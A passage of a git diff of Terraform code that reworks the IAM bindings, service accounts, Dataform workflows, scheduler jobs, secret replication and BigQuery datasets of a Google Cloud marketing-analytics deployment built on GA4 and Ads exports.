Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_email_role_propagation" { + create_duration = "120s" + depends_on = [ + module.email-role + ] +} + # This resource sets the Dataform service account IAM member roles -resource "google_project_iam_member" "dataform-serviceaccount" { +module "dataform-serviceaccount" { + source = "terraform-google-modules/iam/google//modules/member_iam" + version = "~> 8.0" depends_on = [ google_dataform_repository.marketing-analytics, null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation - ] - for_each = toset([ + null_resource.wait_for_dataform_sa_creation, + time_sleep.wait_for_email_role_propagation + ] + service_account_address = local.dataform_sa + project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project_roles = [ "roles/secretmanager.secretAccessor", - "roles/bigquery.jobUser" - ]) - role = each.key - member = "serviceAccount:${local.dataform_sa}" - project = null_resource.check_dataform_api.id != "" ? 
module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + "roles/bigquery.jobUser", + "roles/bigquery.dataOwner", + ] + prefix = "serviceAccount" } +# This resource sets the Dataform service account IAM member roles +#resource "google_project_iam_member" "dataform-serviceaccount" { +# depends_on = [ +# google_dataform_repository.marketing-analytics, +# null_resource.check_dataform_api, +# null_resource.wait_for_dataform_sa_creation, +# time_sleep.wait_for_email_role_propagation +# ] +# for_each = toset([ +# "roles/secretmanager.secretAccessor", +# "roles/bigquery.jobUser", +# "roles/bigquery.dataOwner", +# ]) +# role = each.key +# member = "serviceAccount:${local.dataform_sa}" +# project = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id +#} -// Owner role to BigQuery in the destination data project the Dataform SA. -// Multiple datasets will be created; it requires project-level permissions -resource "google_project_iam_member" "dataform-bigquery-data-owner" { +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_dataform-serviceaccount_role_propagation" { + create_duration = "120s" depends_on = [ - google_dataform_repository.marketing-analytics, - null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation - ] - for_each = toset([ - "roles/bigquery.dataOwner", - ]) - role = each.key - member = "serviceAccount:${local.dataform_sa}" - project = null_resource.check_dataform_api.id != "" ? 
module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + module.dataform-serviceaccount + ] } // Read access to the GA4 exports -resource "google_bigquery_dataset_iam_member" "dataform-ga4-export-reader" { +module "dataform-ga4-export-reader" { + source = "terraform-google-modules/iam/google//modules/bigquery_datasets_iam" + version = "~> 8.0" depends_on = [ google_dataform_repository.marketing-analytics, null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation + null_resource.wait_for_dataform_sa_creation, + time_sleep.wait_for_dataform-serviceaccount_role_propagation + ] + project = var.source_ga4_export_project_id + bigquery_datasets = [ + var.source_ga4_export_dataset, + ] + mode = "authoritative" + + bindings = { + "roles/bigquery.dataViewer" = [ + "serviceAccount:${local.dataform_sa}", + ] + "roles/bigquery.dataEditor" = [ + "serviceAccount:${local.dataform_sa}", ] - role = "roles/bigquery.dataViewer" - member = "serviceAccount:${local.dataform_sa}" - project = var.source_ga4_export_project_id - dataset_id = var.source_ga4_export_dataset + } +} +#resource "google_bigquery_dataset_iam_member" "dataform-ga4-export-reader" { +# depends_on = [ +# google_dataform_repository.marketing-analytics, +# null_resource.check_dataform_api, +# null_resource.wait_for_dataform_sa_creation, +# time_sleep.wait_for_dataform-serviceaccount_role_propagation +# ] +# role = "roles/bigquery.dataViewer" +# member = "serviceAccount:${local.dataform_sa}" +# project = var.source_ga4_export_project_id +# dataset_id = var.source_ga4_export_dataset +#} + +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_dataform-ga4-export-reader_role_propagation" { + create_duration = "120s" + depends_on = [ + module.dataform-ga4-export-reader + ] } // Read access to the Ads datasets -resource "google_bigquery_dataset_iam_member" "dataform-ads-export-reader" { +module "dataform-ads-export-reader" { + source = "terraform-google-modules/iam/google//modules/bigquery_datasets_iam" + version = "~> 8.0" depends_on = [ google_dataform_repository.marketing-analytics, null_resource.check_dataform_api, - null_resource.wait_for_dataform_sa_creation + null_resource.wait_for_dataform_sa_creation, + time_sleep.wait_for_dataform-ga4-export-reader_role_propagation + ] + count = length(var.source_ads_export_data) + project = var.source_ads_export_data[count.index].project + bigquery_datasets = [ + var.source_ads_export_data[count.index].dataset, + ] + mode = "authoritative" + + bindings = { + "roles/bigquery.dataViewer" = [ + "serviceAccount:${local.dataform_sa}", + ] + "roles/bigquery.dataEditor" = [ + "serviceAccount:${local.dataform_sa}", ] - count = length(var.source_ads_export_data) - role = "roles/bigquery.dataViewer" - member = "serviceAccount:${local.dataform_sa}" - project = var.source_ads_export_data[count.index].project - dataset_id = var.source_ads_export_data[count.index].dataset + } +} +#resource "google_bigquery_dataset_iam_member" "dataform-ads-export-reader" { +# depends_on = [ +# google_dataform_repository.marketing-analytics, +# null_resource.check_dataform_api, +# null_resource.wait_for_dataform_sa_creation, +# time_sleep.wait_for_dataform-ga4-export-reader_role_propagation +# ] +# count = length(var.source_ads_export_data) +# role = 
"roles/bigquery.dataViewer" +# member = "serviceAccount:${local.dataform_sa}" +# project = var.source_ads_export_data[count.index].project +# dataset_id = var.source_ads_export_data[count.index].dataset +#} + +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_dataform-ads-export-reader_role_propagation" { + create_duration = "120s" + depends_on = [ + module.dataform-ads-export-reader + ] } diff --git a/infrastructure/terraform/modules/data-store/main.tf b/infrastructure/terraform/modules/data-store/main.tf index 214f170c..9704661b 100644 --- a/infrastructure/terraform/modules/data-store/main.tf +++ b/infrastructure/terraform/modules/data-store/main.tf @@ -21,7 +21,7 @@ data "google_project" "data_processing" { } data "google_secret_manager_secret" "github_secret_name" { - secret_id = google_secret_manager_secret.github-secret.name + secret_id = google_secret_manager_secret.github-secret.secret_id project = var.data_processing_project_id } @@ -29,88 +29,19 @@ provider "google" { region = var.google_default_region } -# This module sets up a Dataform workflow environment for the "dev" environment. -module "dataform-workflow-dev" { - # The count argument specifies how many instances of the module should be created. - # In this case, it's set to var.create_dev_environment ? 1 : 0, which means that - # the module will be created only if the var.create_dev_environment variable is set to `true`. - # Check the terraform.tfvars file for more information. - count = var.create_dev_environment ? 1 : 0 - # the path to the Terraform module that will be used to create the Dataform workflow environment. - source = "../dataform-workflow" - - project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id - # The name of the Dataform workflow environment. - environment = "dev" - region = var.google_default_region - # The ID of the Dataform repository that will be used by the Dataform workflow environment. - dataform_repository_id = google_dataform_repository.marketing-analytics.id - # A list of tags that will be used to filter the Dataform files that are included in the Dataform workflow environment. - includedTags = ["ga4"] - - source_ga4_export_project_id = var.source_ga4_export_project_id - source_ga4_export_dataset = var.source_ga4_export_dataset - ga4_incremental_processing_days_back = var.ga4_incremental_processing_days_back - source_ads_export_data = var.source_ads_export_data - destination_bigquery_project_id = length(var.dev_data_project_id) > 0 ? var.staging_data_project_id : var.data_project_id - destination_bigquery_dataset_location = length(var.dev_destination_data_location) > 0 ? var.dev_destination_data_location : var.destination_data_location - - # The daily schedule for running the Dataform workflow. - # Depending on the hour that your Google Analytics 4 BigQuery Export is set, - # you may have to change this to execute at a later time of the day. - # Observe that the GA4 BigQuery Export Schedule documentation - # https://support.google.com/analytics/answer/9358801?hl=en#:~:text=A%20full%20export%20of%20data,(see%20Streaming%20export%20below). - # Check https://crontab.guru/#0_5-23/4_*_*_* to see next execution times. 
- daily_schedule = "0 5-23/4 * * *" -} - -# This module sets up a Dataform workflow environment for the "staging" environment. -module "dataform-workflow-staging" { - # The count argument specifies how many instances of the module should be created. - # In this case, it's set to var.create_staging_environment ? 1 : 0, which means that - # the module will be created only if the var.create_staging_environment variable is set to `true`. - # Check the terraform.tfvars file for more information. - count = var.create_staging_environment ? 1 : 0 - # the path to the Terraform module that will be used to create the Dataform workflow environment. - source = "../dataform-workflow" - - project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id - # The name of the Dataform workflow environment. - environment = "staging" - region = var.google_default_region - # The ID of the Dataform repository that will be used by the Dataform workflow environment. - dataform_repository_id = google_dataform_repository.marketing-analytics.id - # A list of tags that will be used to filter the Dataform files that are included in the Dataform workflow environment. - includedTags = ["ga4"] - - source_ga4_export_project_id = var.source_ga4_export_project_id - source_ga4_export_dataset = var.source_ga4_export_dataset - source_ads_export_data = var.source_ads_export_data - destination_bigquery_project_id = length(var.staging_data_project_id) > 0 ? var.staging_data_project_id : var.data_project_id - destination_bigquery_dataset_location = length(var.staging_destination_data_location) > 0 ? var.staging_destination_data_location : var.destination_data_location - - # The daily schedule for running the Dataform workflow. - # Depending on the hour that your Google Analytics 4 BigQuery Export is set, - # you may have to change this to execute at a later time of the day. - # Observe that the GA4 BigQuery Export Schedule documentation - # https://support.google.com/analytics/answer/9358801?hl=en#:~:text=A%20full%20export%20of%20data,(see%20Streaming%20export%20below). - # Check https://crontab.guru/#0_5-23/4_*_*_* to see next execution times. - daily_schedule = "0 5-23/4 * * *" -} - # This module sets up a Dataform workflow environment for the "prod" environment. module "dataform-workflow-prod" { # The count argument specifies how many instances of the module should be created. - # In this case, it's set to var.create_prod_environment ? 1 : 0, which means that - # the module will be created only if the var.create_prod_environment variable is set to `true`. + # In this case, it's set to var.deploy_dataform ? 1 : 0, which means that + # the module will be created only if the var.deploy_dataform variable is set to `true`. # Check the terraform.tfvars file for more information. - count = var.create_prod_environment ? 1 : 0 + count = var.deploy_dataform ? 1 : 0 # the path to the Terraform module that will be used to create the Dataform workflow environment. source = "../dataform-workflow" - project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project_id = null_resource.check_dataform_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id # The name of the Dataform workflow environment. 
- environment = "prod" + property_id = var.property_id region = var.google_default_region dataform_repository_id = google_dataform_repository.marketing-analytics.id @@ -127,4 +58,5 @@ module "dataform-workflow-prod" { # https://support.google.com/analytics/answer/9358801?hl=en#:~:text=A%20full%20export%20of%20data,(see%20Streaming%20export%20below). # Check https://crontab.guru/#0_5-23/2_*_*_* to see next execution times. daily_schedule = "0 5-23/2 * * *" + time_zone = var.time_zone } diff --git a/infrastructure/terraform/modules/data-store/secretmanager.tf b/infrastructure/terraform/modules/data-store/secretmanager.tf index d89b86e5..2d4d6889 100644 --- a/infrastructure/terraform/modules/data-store/secretmanager.tf +++ b/infrastructure/terraform/modules/data-store/secretmanager.tf @@ -14,11 +14,26 @@ resource "google_secret_manager_secret" "github-secret" { secret_id = "Github_token" - project = null_resource.check_secretmanager_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + project = null_resource.check_secretmanager_api.id != "" ? module.data_processing_project_services.project_id : data.google_project.data_processing.project_id + # This replication strategy will deploy replicas that may store the secret in different locations around the globe. + # This is not a desired behaviour; make sure you're aware of it before enabling it. + #replication { + # auto {} + #} + + # By default, to respect resource location, we prevent resources from being deployed globally by storing secrets in the same region as the compute resources. + # If the replication strategy is set to `auto {}` above, comment out the following lines or Terraform will raise an error. replication { - #automatic = true - auto {} + user_managed { + replicas { + location = var.google_default_region + } + # If you want your replicas in other locations, uncomment the following lines and add them here. + #replicas { + # location = "us-east1" + #} + } } depends_on = [ @@ -28,7 +43,7 @@ resource "google_secret_manager_secret" "github-secret" { } resource "google_secret_manager_secret_version" "secret-version-github" { - secret = google_secret_manager_secret.github-secret.id + secret = google_secret_manager_secret.github-secret.id secret_data = var.dataform_github_token #deletion_policy = "DISABLE" @@ -38,4 +53,4 @@ resource "google_secret_manager_secret_version" "secret-version-github" { null_resource.check_dataform_api, null_resource.check_secretmanager_api ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/data-store/variables.tf b/infrastructure/terraform/modules/data-store/variables.tf index 62bc24f1..bd11aab7 100644 --- a/infrastructure/terraform/modules/data-store/variables.tf +++ b/infrastructure/terraform/modules/data-store/variables.tf @@ -38,21 +38,15 @@ variable "project_owner_email" { } variable "dataform_github_repo" { - description = "Private Github repo for Dataform." + description = "Private GitHub repo for Dataform." type = string } variable "dataform_github_token" { - description = "Github token for Dataform repo." + description = "GitHub token for Dataform repo." type = string } -variable "create_dev_environment" { - description = "Indicates that a development environment needs to be created" - type = bool - default = true -} - variable "dev_data_project_id" { description = "Project ID of where the dev datasets will created. If not provided, data_project_id will be used."
type = string @@ -65,12 +59,6 @@ variable "dev_destination_data_location" { default = "" } -variable "create_staging_environment" { - description = "Indicates that a staging environment needs to be created" - type = bool - default = true -} - variable "staging_data_project_id" { description = "Project ID of where the staging datasets will created. If not provided, data_project_id will be used." type = string @@ -83,12 +71,18 @@ variable "staging_destination_data_location" { default = "" } -variable "create_prod_environment" { - description = "Indicates that a production environment needs to be created" +variable "deploy_dataform" { + description = "Indicates that a dataform workspace needs to be created" type = bool default = true } +variable "property_id" { + description = "Google Analytics 4 Property id to create an MDS for it" + type = string + default = "" +} + variable "prod_data_project_id" { description = "Project ID of where the prod datasets will created. If not provided, data_project_id will be used." type = string @@ -112,7 +106,7 @@ variable "source_ga4_export_dataset" { } variable "ga4_incremental_processing_days_back" { - type = string + type = string default = "3" } @@ -128,4 +122,8 @@ variable "source_ads_export_data" { variable "dataform_region" { description = "Specify dataform region when dataform is not available in the default cloud region of choice" type = string -} \ No newline at end of file +} + +variable "time_zone" { + type = string +} diff --git a/infrastructure/terraform/modules/data-store/versions.tf b/infrastructure/terraform/modules/data-store/versions.tf index 8821ac39..ae05aad2 100644 --- a/infrastructure/terraform/modules/data-store/versions.tf +++ b/infrastructure/terraform/modules/data-store/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/dataform-workflow/README.md b/infrastructure/terraform/modules/dataform-workflow/README.md index 8b2bdff5..9ff7546b 100644 --- a/infrastructure/terraform/modules/dataform-workflow/README.md +++ b/infrastructure/terraform/modules/dataform-workflow/README.md @@ -1 +1 @@ -# Dataform workflow module \ No newline at end of file +# Dataform workflow module diff --git a/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf b/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf index a0d7d153..99e3921c 100644 --- a/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf +++ b/infrastructure/terraform/modules/dataform-workflow/dataform-workflow.tf @@ -22,10 +22,10 @@ locals { # This resources creates a workflow that runs the Dataform incremental pipeline. resource "google_workflows_workflow" "dataform-incremental-workflow" { project = null_resource.check_workflows_api.id != "" ? 
module.data_processing_project_services.project_id : var.project_id - name = "dataform-${var.environment}-incremental" + name = "dataform-${var.property_id}-incremental" region = var.region - description = "Dataform incremental workflow for ${var.environment} environment" - service_account = google_service_account.workflow-dataform.email + description = "Dataform incremental workflow for ${var.property_id} ga4 property" + service_account = module.workflow-dataform.email # The source code includes the following steps: # Init: This step initializes the workflow by assigning the value of the dataform_repository_id variable to the repository variable. # Create Compilation Result: This step creates a compilation result for the Dataform repository. The compilation result includes the git commit hash and the code compilation configuration. @@ -49,7 +49,7 @@ main: defaultDatabase: ${var.destination_bigquery_project_id} defaultLocation: ${var.destination_bigquery_dataset_location} vars: - env: ${var.environment} + ga4_property_id: '${var.property_id}' ga4_export_project: ${var.source_ga4_export_project_id} ga4_export_dataset: ${var.source_ga4_export_dataset} ga4_incremental_processing_days_back: '${var.ga4_incremental_processing_days_back}' diff --git a/infrastructure/terraform/modules/dataform-workflow/scheduler.tf b/infrastructure/terraform/modules/dataform-workflow/scheduler.tf index 3947b3b8..fed10fc8 100644 --- a/infrastructure/terraform/modules/dataform-workflow/scheduler.tf +++ b/infrastructure/terraform/modules/dataform-workflow/scheduler.tf @@ -14,12 +14,12 @@ # This creates a Cloud Scheduler job that triggers the Dataform incremental workflow on a daily schedule. resource "google_cloud_scheduler_job" "daily-dataform-increments" { - project = module.data_processing_project_services.project_id - name = "daily-dataform-${var.environment}" - description = "Daily Dataform ${var.environment} environment incremental update" + project = module.data_processing_project_services.project_id + name = "daily-dataform-${var.property_id}" + description = "Daily Dataform ${var.property_id} property export incremental update" # The schedule attribute specifies the schedule for the job. In this case, the job is scheduled to run daily at the specified times. - schedule = var.daily_schedule - time_zone = "America/New_York" + schedule = var.daily_schedule + time_zone = var.time_zone # The attempt_deadline attribute specifies the maximum amount of time that the job will attempt to run before failing. # In this case, the job will attempt to run for a maximum of 5 minutes before failing. attempt_deadline = "320s" @@ -35,7 +35,7 @@ resource "google_cloud_scheduler_job" "daily-dataform-increments" { uri = "https://workflowexecutions.googleapis.com/v1/projects/${module.data_processing_project_services.project_id}/locations/${var.region}/workflows/${google_workflows_workflow.dataform-incremental-workflow.name}/executions" oauth_token { - service_account_email = google_service_account.scheduler.email + service_account_email = module.scheduler.email } } } diff --git a/infrastructure/terraform/modules/dataform-workflow/service-account.tf b/infrastructure/terraform/modules/dataform-workflow/service-account.tf index 39d31811..95e518e1 100644 --- a/infrastructure/terraform/modules/dataform-workflow/service-account.tf +++ b/infrastructure/terraform/modules/dataform-workflow/service-account.tf @@ -12,20 +12,36 @@ # See the License for the specific language governing permissions and # limitations under the License. 
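The scheduler.tf changes above wire a per-property Cloud Scheduler job to the dataform-<property_id>-incremental workflow via the scheduler service account's OAuth token. For a one-off smoke test after deployment you can trigger either side directly; the sketch below assumes placeholder project, region and property values.

```bash
# Illustrative smoke test: project, region and property ID are placeholders.
PROJECT_ID="my-data-processing-project"
REGION="us-central1"      # assumption: the region passed to the dataform-workflow module
PROPERTY_ID="123456789"   # assumption: the GA4 property ID used as var.property_id

# Option 1: run the incremental Dataform workflow directly and wait for the result.
gcloud workflows run "dataform-${PROPERTY_ID}-incremental" \
  --project="${PROJECT_ID}" --location="${REGION}"

# Option 2: force-run the Cloud Scheduler job that normally triggers it daily.
gcloud scheduler jobs run "daily-dataform-${PROPERTY_ID}" \
  --project="${PROJECT_ID}" --location="${REGION}"
```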
-resource "google_service_account" "scheduler" { +locals { + scheduler_sa = "workflow-scheduler-${var.property_id}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" + workflows_sa = "workflow-dataform-${var.property_id}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" +} + +module "scheduler" { + source = "terraform-google-modules/service-accounts/google//modules/simple-sa" + version = "~> 4.0" + + project_id = null_resource.check_cloudscheduler_api.id != "" ? module.data_processing_project_services.project_id : var.project_id + name = "workflow-scheduler-${var.property_id}" + project_roles = [ + "roles/workflows.invoker" + ] + depends_on = [ module.data_processing_project_services, null_resource.check_cloudscheduler_api, - ] - - project = null_resource.check_cloudscheduler_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - account_id = "workflow-scheduler-${var.environment}" - display_name = "Service Account to schedule Dataform workflows in ${var.environment}" + ] } -locals { - scheduler_sa = "workflow-scheduler-${var.environment}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" - workflows_sa = "workflow-dataform-${var.environment}@${module.data_processing_project_services.project_id}.iam.gserviceaccount.com" +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_scheduler_service_account_role_propagation" { + create_duration = "120s" + depends_on = [ + module.scheduler + ] } # Wait for the scheduler service account to be created @@ -37,7 +53,7 @@ resource "null_resource" "wait_for_scheduler_sa_creation" { MAX_TRIES=100 while ! gcloud iam service-accounts list --project=${module.data_processing_project_services.project_id} --filter="EMAIL:${local.scheduler_sa} AND DISABLED:False" --format="table(EMAIL, DISABLED)" && [ $COUNTER -lt $MAX_TRIES ] do - sleep 3 + sleep 10 printf "." COUNTER=$((COUNTER + 1)) done @@ -45,37 +61,44 @@ resource "null_resource" "wait_for_scheduler_sa_creation" { echo "scheduler service account was not created, terraform can not continue!" exit 1 fi - sleep 20 + sleep 120 EOT } depends_on = [ module.data_processing_project_services, - null_resource.check_dataform_api + time_sleep.wait_for_scheduler_service_account_role_propagation, + null_resource.check_dataform_api, + module.scheduler, ] } -resource "google_project_iam_member" "scheduler-workflow-invoker" { - depends_on = [ - module.data_processing_project_services, - null_resource.check_cloudscheduler_api, - null_resource.wait_for_scheduler_sa_creation - ] +module "workflow-dataform" { + source = "terraform-google-modules/service-accounts/google//modules/simple-sa" + version = "~> 4.0" - project = null_resource.check_cloudscheduler_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - member = "serviceAccount:${google_service_account.scheduler.email}" - role = "roles/workflows.invoker" -} + project_id = null_resource.check_workflows_api.id != "" ? 
module.data_processing_project_services.project_id : var.project_id + name = "workflow-dataform-${var.property_id}" + project_roles = [ + "roles/dataform.editor" + ] -resource "google_service_account" "workflow-dataform" { depends_on = [ module.data_processing_project_services, null_resource.check_workflows_api, - ] - - project = null_resource.check_workflows_api.id != "" ? module.data_processing_project_services.project_id : var.project_id - account_id = "workflow-dataform-${var.environment}" - display_name = "Service Account to run Dataform workflows in ${var.environment}" + null_resource.check_dataform_api, + ] +} + +# Propagation time for change of access policy typically takes 2 minutes +# according to https://cloud.google.com/iam/docs/access-change-propagation +# this wait make sure the policy changes are propagated before proceeding +# with the build +resource "time_sleep" "wait_for_workflow_dataform_service_account_role_propagation" { + create_duration = "120s" + depends_on = [ + module.workflow-dataform + ] } # Wait for the workflows service account to be created @@ -86,7 +109,7 @@ resource "null_resource" "wait_for_workflows_sa_creation" { MAX_TRIES=100 while ! gcloud iam service-accounts list --project=${module.data_processing_project_services.project_id} --filter="EMAIL:${local.workflows_sa} AND DISABLED:False" --format="table(EMAIL, DISABLED)" && [ $COUNTER -lt $MAX_TRIES ] do - sleep 3 + sleep 10 printf "." COUNTER=$((COUNTER + 1)) done @@ -94,25 +117,14 @@ resource "null_resource" "wait_for_workflows_sa_creation" { echo "workflows service account was not created, terraform can not continue!" exit 1 fi - sleep 20 + sleep 120 EOT } depends_on = [ module.data_processing_project_services, - null_resource.check_dataform_api + null_resource.check_dataform_api, + module.workflow-dataform, + time_sleep.wait_for_workflow_dataform_service_account_role_propagation, ] } - - -resource "google_project_iam_member" "worflow-dataform-dataform-editor" { - depends_on = [ - module.data_processing_project_services, - null_resource.check_dataform_api, - null_resource.wait_for_workflows_sa_creation - ] - - project = null_resource.check_workflows_api.id != "" ? 
module.data_processing_project_services.project_id : var.project_id - member = "serviceAccount:${google_service_account.workflow-dataform.email}" - role = "roles/dataform.editor" -} \ No newline at end of file diff --git a/infrastructure/terraform/modules/dataform-workflow/services.tf b/infrastructure/terraform/modules/dataform-workflow/services.tf index 0271f228..c85ff589 100644 --- a/infrastructure/terraform/modules/dataform-workflow/services.tf +++ b/infrastructure/terraform/modules/dataform-workflow/services.tf @@ -15,7 +15,7 @@ # https://registry.terraform.io/modules/terraform-google-modules/project-factory/google/latest/submodules/project_services module "data_processing_project_services" { source = "terraform-google-modules/project-factory/google//modules/project_services" - version = "14.1.0" + version = "18.0.0" disable_dependent_services = false disable_services_on_destroy = false @@ -142,4 +142,4 @@ resource "null_resource" "check_cloudscheduler_api" { depends_on = [ module.data_processing_project_services ] -} \ No newline at end of file +} diff --git a/infrastructure/terraform/modules/dataform-workflow/variables.tf b/infrastructure/terraform/modules/dataform-workflow/variables.tf index 60b014d8..97d5dc73 100644 --- a/infrastructure/terraform/modules/dataform-workflow/variables.tf +++ b/infrastructure/terraform/modules/dataform-workflow/variables.tf @@ -22,12 +22,12 @@ variable "region" { type = string } -variable "environment" { +variable "property_id" { type = string } variable "daily_schedule" { - type = string + type = string # This schedule executes every days, each 2 hours between 5AM and 11PM. default = "0 5-23/2 * * *" #"2 5 * * *" } @@ -45,7 +45,7 @@ variable "source_ga4_export_dataset" { } variable "ga4_incremental_processing_days_back" { - type = string + type = string default = "3" } @@ -74,4 +74,8 @@ variable "gitCommitish" { variable "includedTags" { type = list(string) default = [] -} \ No newline at end of file +} + +variable "time_zone" { + type = string +} diff --git a/infrastructure/terraform/modules/dataform-workflow/versions.tf b/infrastructure/terraform/modules/dataform-workflow/versions.tf index 8821ac39..ae05aad2 100644 --- a/infrastructure/terraform/modules/dataform-workflow/versions.tf +++ b/infrastructure/terraform/modules/dataform-workflow/versions.tf @@ -20,7 +20,12 @@ terraform { required_providers { google = { source = "hashicorp/google" - version = ">= 3.43.0, >= 3.53.0, >= 3.63.0, >= 4.83.0, < 5.0.0, < 6.0.0" + version = "5.45.0" + } + + google-beta = { + source = "hashicorp/google-beta" + version = "5.45.0" } } diff --git a/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf b/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf index c51927c3..0a56fdaf 100644 --- a/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf +++ b/infrastructure/terraform/modules/feature-store/bigquery-datasets.tf @@ -14,14 +14,14 @@ # This resource creates a BigQuery dataset called `feature_store`. resource "google_bigquery_dataset" "feature_store" { - dataset_id = local.config_bigquery.dataset.feature_store.name - friendly_name = local.config_bigquery.dataset.feature_store.friendly_name - project = null_resource.check_bigquery_api.id != "" ? 
local.feature_store_project_id : var.project_id - description = local.config_bigquery.dataset.feature_store.description - location = local.config_bigquery.dataset.feature_store.location + dataset_id = local.config_bigquery.dataset.feature_store.name + friendly_name = local.config_bigquery.dataset.feature_store.friendly_name + project = local.feature_store_project_id + description = local.config_bigquery.dataset.feature_store.description + location = local.config_bigquery.dataset.feature_store.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.feature_store.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.feature_store.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -40,14 +40,14 @@ resource "google_bigquery_dataset" "feature_store" { # This resource creates a BigQuery dataset called `purchase_propensity`. resource "google_bigquery_dataset" "purchase_propensity" { - dataset_id = local.config_bigquery.dataset.purchase_propensity.name - friendly_name = local.config_bigquery.dataset.purchase_propensity.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.purchase_propensity.description - location = local.config_bigquery.dataset.purchase_propensity.location + dataset_id = local.config_bigquery.dataset.purchase_propensity.name + friendly_name = local.config_bigquery.dataset.purchase_propensity.friendly_name + project = local.purchase_propensity_project_id + description = local.config_bigquery.dataset.purchase_propensity.description + location = local.config_bigquery.dataset.purchase_propensity.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.purchase_propensity.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.purchase_propensity.max_time_travel_hours # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. delete_contents_on_destroy = false @@ -66,14 +66,40 @@ resource "google_bigquery_dataset" "purchase_propensity" { # This resource creates a BigQuery dataset called `churn_propensity`. 
resource "google_bigquery_dataset" "churn_propensity" { - dataset_id = local.config_bigquery.dataset.churn_propensity.name - friendly_name = local.config_bigquery.dataset.churn_propensity.friendly_name - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id - description = local.config_bigquery.dataset.churn_propensity.description - location = local.config_bigquery.dataset.churn_propensity.location + dataset_id = local.config_bigquery.dataset.churn_propensity.name + friendly_name = local.config_bigquery.dataset.churn_propensity.friendly_name + project = local.churn_propensity_project_id + description = local.config_bigquery.dataset.churn_propensity.description + location = local.config_bigquery.dataset.churn_propensity.location # The max_time_travel_hours attribute specifies the maximum number of hours that data in the dataset can be accessed using time travel queries. # In this case, the maximum time travel hours is set to the value of the local file config.yaml section bigquery.dataset.feature_store.max_time_travel_hours configuration. - max_time_travel_hours = local.config_bigquery.dataset.churn_propensity.max_time_travel_hours + max_time_travel_hours = local.config_bigquery.dataset.churn_propensity.max_time_travel_hours + # The delete_contents_on_destroy attribute specifies whether the contents of the dataset should be deleted when the dataset is destroyed. + # In this case, the delete_contents_on_destroy attribute is set to false, which means that the contents of the dataset will not be deleted when the dataset is destroyed. + delete_contents_on_destroy = false + + labels = { + version = "prod" + } + + # The lifecycle block allows you to configure the lifecycle of the dataset. + # In this case, the ignore_changes attribute is set to all, which means that + # Terraform will ignore any changes to the dataset and will not attempt to update the dataset. + lifecycle { + ignore_changes = all + } +} + +# This resource creates a BigQuery dataset called `lead_score_propensity`. +resource "google_bigquery_dataset" "lead_score_propensity" { + dataset_id = local.config_bigquery.dataset.lead_score_propensity.name + friendly_name = 